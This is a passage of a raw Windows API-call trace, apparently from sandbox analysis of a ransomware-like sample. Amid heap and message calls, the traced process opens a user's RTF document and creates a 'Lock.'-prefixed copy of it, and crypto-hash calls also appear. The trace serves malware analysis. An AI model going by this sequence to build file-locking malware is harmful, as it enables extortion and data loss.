Size=0x10) returned 0x2e51f10 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.239] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0268.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0268.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0268.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.239] CryptDestroyHash (hHash=0xa87690) returned 1 [0268.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0268.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.242] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0268.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0268.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0268.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/y89VhZ.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\y89vhz.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0268.243] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.243] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.244] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0268.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0268.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.245] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0268.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0268.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0268.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0268.246] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.y89VhZ.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\lock.y89vhz.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0268.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0268.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0268.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0268.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0268.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0268.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125f020 [0268.251] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0268.251] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x67fb, lpOverlapped=0x0) returned 1 [0268.253] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0268.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67fb) returned 0x2f16018 [0268.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125f020 | out: hHeap=0x970000) returned 1 [0268.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0268.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67fb) returned 0x2f16018 [0268.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0268.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 